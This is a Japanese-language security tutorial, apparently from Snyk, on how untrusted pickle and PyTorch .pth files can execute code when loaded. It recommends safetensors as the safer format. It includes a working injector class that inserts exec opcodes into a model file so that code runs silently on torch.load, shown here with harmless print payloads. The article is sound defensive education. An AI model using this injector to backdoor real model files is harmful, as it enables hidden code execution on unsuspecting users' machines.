In this article
Python Pickleによる汚染とPthファイルへのバックドア埋め込み
Pythonのpickleモジュールはオブジェクトのシリアライズに便利ですが、信頼できないファイルをデシリアライズすると悪意あるコードが実行される可能性があり、セキュリティリスクを伴います。共有された.pthファイルを使う機械学習のワークフローでは、特に注意が必要です。
ここではpickleとPyTorchの例を紹介します。まず、PyTorchのセットアップを確認しましょう。
# Check PyTorch Version, PyTorch GPU, torch cuda version
try:
import torch
print(f'PyTorch Version: {torch.__version__}')
print(f'Path: {torch.__file__}')
print(f'\nCUDA Available: {torch.cuda.is_available()}')
if torch.cuda.is_available():
print(f'CUDA Version: {torch.version.cuda}')
print(f'Graphics Card: {torch.cuda.get_device_name(0)}')
print(f'# of GPUs: {torch.cuda.device_count()}')
for i in range(torch.cuda.device_count()):
print(f'\nGPU {i} Details:')
print(f' Name: {torch.cuda.get_device_name(i)}')
print(f' Memory: {torch.cuda.get_device_properties(i).total_memory / 1024**3:.2f} GB')
else:
print('\nRunning on CPU only')
import multiprocessing
print(f'CPU Cores: {multiprocessing.cpu_count()}')
except ImportError:
print('PyTorch is not installed. Install with: pip install torch')
except Exception as e:
print(f'An error occurred: {str(e)}')PyTorchをインストールする必要がある場合、環境によって手順が大きく異なることがあります。こちらの手順に従うことをおすすめします。
次のようにして、インストールされているpickleのバージョンとプロトコルを確認できます。
$ python3 -c "import pickle; print(f'Default Protocol: {pickle.DEFAULT_PROTOCOL}\nHighest Protocol: {pickle.HIGHEST_PROTOCOL}\nAll Available Protocols: {list(range(pickle.HIGHEST_PROTOCOL + 1))}')"
pickleモジュールはPythonの標準ライブラリに含まれているため、pip install pickleのようなインストールコマンドを実行する必要はありません。
PythonのPickleとは何ですか?
pickleライブラリは、Python標準のシリアライズプロトコルです。複雑なPythonオブジェクトを「オペコード」と呼ばれる一連の命令として保存でき、これらの命令を実行することでシリアライズされたオブジェクトを再構築します。また、オブジェクトへの参照やオブジェクト間の関係も保持できます。
ここからは、pickleを悪用した任意コード実行の具体例を見ていきます。
悪意あるコードによるPython Pickleの汚染
pickleファイルを作成し、ファイルのデシリアライズ時に実行させたい任意のコードを含むクラスのインスタンスを挿入します。次に、エンドユーザーがこのファイルを読み込むことで、この脆弱性が悪用される仕組みを紹介します。
import pickle
import random
# Generate random tabular data for our example
tabular_data = [
{
"id": i,
"name": f"Item-{i}",
"value": random.randint(1, 100),
"category": random.choice(['A', 'B', 'C'])
}
for i in range(1, 6)
]
# Store the pickle data in a file named 'payload.pkl'
# At this stage, payload.pkl would behave as expected with no potentially malicious side effects during deserialization.
with open('payload.pkl', 'wb') as f:
pickle.dump(tabular_data, f)
# Our class containing arbitrary code we want to execute:
class Malicious:
def __reduce__(self):
# The following code will execute during deserialization
return (print, ("Hello World! Only load pkl files from trusted sources!",))
# Replace original data with malicious code
malicious_payload = Malicious()
# Store potentially malicious pickle data in the same file
with open('payload.pkl', 'wb') as f:
pickle.dump([tabular_data, malicious_payload], f)
# Load the pickle file to show potentially malicious side effects
print("Loading the pickle file 'payload.pkl':")
with open('payload.pkl', 'rb') as f:
data = pickle.load(f)
# Verify the content of the loaded data
print("\nLoaded data:")
print(data)この例では、シンプルなHello Worldを出力するだけです。しかし、悪意あるサンプルにはランサムウェアが含まれている可能性があります。
悪意あるコードによるPyTorchモデルのPthファイルの汚染
同様の手順で、pthファイルにも悪意あるコードを埋め込めます。
import torch
import torchvision.models as models
import zipfile
import struct
from pathlib import Path
class PthCodeInjector:
"""Minimal implementation to inject code into PyTorch pickle files. (ZIP file with data.pkl)"""
def __init__(self, filepath: str):
self.filepath = Path(filepath)
def inject_payload(self, code: str, output_path: str):
"""Inject Python code into the pickle file."""
# Read original pickle from zip
with zipfile.ZipFile(self.filepath, "r") as zip_ref:
data_pkl_path = next(name for name in zip_ref.namelist() if name.endswith("/data.pkl"))
pickle_data = zip_ref.open(data_pkl_path).read()
# Find insertion point after protocol bytes
i = 2 # Skip PROTO opcode and version byte
# Create exec sequence with protocol 4 pickle opcodes
exec_sequence = (
b'c' + b'builtins\nexec\n' + # GLOBAL opcode + module + attr
b'(' + # MARK opcode
b'\x8c' + struct.pack('<B', len(code)) + code.encode('utf-8') + # SHORT_BINUNICODE
b't' + # TUPLE
b'R' # REDUCE
)
# Insert exec sequence after protocol bytes
modified_pickle = pickle_data[:i] + exec_sequence + pickle_data[i:]
# Write modified pickle back to zip
with zipfile.ZipFile(output_path, 'w') as new_zip:
with zipfile.ZipFile(self.filepath, 'r') as orig_zip:
for item in orig_zip.infolist():
if item.filename.endswith('/data.pkl'):
new_zip.writestr(item.filename, modified_pickle)
else:
new_zip.writestr(item.filename, orig_zip.open(item).read())
# Example and validation
if __name__ == "__main__":
# Create and save original model
torch.manual_seed(0) # For reproducibility and comparing the outputs of the models
model = models.mobilenet_v2()
model.eval()
torch.save(model, "mobilenet.pth")
# Test original model
test_input = torch.randn(1, 3, 224, 224)
original_output = model(test_input)
# Inject payload
modifier = PthCodeInjector("mobilenet.pth")
modifier.inject_payload("print('Hello world! Only load pth files from trusted sources!')", "modified.pth")
# Load and test modified model
modified_model = torch.load("modified.pth") # Should print warning
modified_model.eval()
modified_output = modified_model(test_input)
# Verify models are identical
print("\nVerifying model equivalence:")
print(f"Structure matches: {str(model) == str(modified_model)}")
print(f"Outputs match: {torch.allclose(original_output, modified_output)}")
print(f"Parameters match: {all(torch.equal(p1, p2) for p1, p2 in zip(model.parameters(), modified_model.parameters()))}")ficklingを使えば、コードを直接挿入でき、より洗練された柔軟な方法で対処できます。ただし、このコードでは、脆弱性を可能にする仕組みを最小限の例で確認できます。この例では、pickleファイルを構成するオペコードを読み込み、既存のオペコードの間に悪意ある可能性のあるコードを挿入します。そのため、エンドユーザーがモデルを読み込んでも、読み込まれたモデルの機能に違いは現れません。
Safetensorsでモデルの重みを共有する
できれば、ニューラルネットワークの重みは最初からsafetensors形式で共有するのが望ましいでしょう。上記の例を変更して、PyTorchでこの形式にエクスポートする方法の一つを示します。
import torch
from torch import nn
from safetensors.torch import save_file, load_file
# Example PyTorch model (a simple feed-forward neural network)
class SimpleModel(nn.Module):
def __init__(self):
super(SimpleModel, self).__init__()
self.fc1 = nn.Linear(10, 50)
self.fc2 = nn.Linear(50, 2)
def forward(self, x):
x = torch.relu(self.fc1(x))
return self.fc2(x)
# Create an instance of the model
model = SimpleModel()
# Generate some random weights (or assume it's a trained model)
example_input = torch.randn(1, 10)
output = model(example_input) # Forward pass with random input
# Save the model's weights to Safetensors format
weights = model.state_dict() # Get the state dictionary of the model
save_file(weights, "model.safetensors")
# Loading the model's weights from Safetensors format
loaded_weights = load_file("model.safetensors")
model.load_state_dict(loaded_weights)
# Verify loading worked by making another forward pass
output = model(example_input)
print("\nModel output after loading weights from 'model.safetensors':")
print(output)生成されたsafetensorsファイルには対応する重みが含まれており、コードで定義済みのアーキテクチャと組み合わせることで、モデル全体を読み込めます。しかし、多くのモデル、特に古いモデルでは、このワークフローが採用されていません。pickleファイルは今も広く配布されており、PyTorchで学習させたニューラルネットワークを保存する際のデフォルト形式も、依然としてpickleシリアライズ形式です。
オブジェクトのデシリアライズを利用したその他の攻撃
pickleのようなオブジェクトシリアライズ形式に保存されるデータは、ニューラルネットワークの重みだけではありません。データセット全体がpickleファイルとして保存されることも多く、たとえばR言語ではデータセットがRDSファイルとして保存されることがよくあります。
重みにごくわずかな変化として悪意あるコードを埋め込めば、モデルの精度への影響を最小限に抑えながら、テンソル、つまりモデルの重み自体に悪意あるコードを直接埋め込むこともできます。この手法はテンソルステガノグラフィと呼ばれます。pickleのデシリアライズを悪用する攻撃と組み合わせると、特に発見しにくい攻撃手法になります。見かけ上はpickleがテンソルをデシリアライズしているだけに見えても、実際にはメモリ上で悪意あるコードを再構築して実行している可能性があります。ただし、これにもpickle形式の脆弱性を悪用する必要があります。safetensorsなら、メモリ上に埋め込まれた悪意あるコードを再構築して実行することはありません。
生成AIのワークフローでは、ベースモデルのカスタマイズや機能拡張に使うファイルも扱います。ユーザーはLORA、ControlNet、IPAdapterのバリエーション、Textual Inversionのチェックポイントなどをダウンロードすることがよくあります。ここで説明した基本原則は、こうしたファイルにも当てはまります。LORAはsafetensors形式で共有されることが多い一方、その他の形式ではあまり一般的ではありません。pickleでシリアライズされたファイルをダウンロードする際は注意してください。
実践的な演習をさらに体験する
Snykでは、このエクスプロイトを利用して、Python Pickleに関連する脆弱性の悪用方法を学べるCTF(Capture The Flag)イベントを開催しています。PythonのエクスプロイトラボはSauerkrautという名前で、John Hammondがこちらで紹介しています。
Pythonアプリケーションのセキュリティや、コードインジェクション、XPathインジェクションなどの脆弱性について詳しく知りたい方は、Snyk LearnのPython開発者向けセキュリティレッスンをご覧ください。
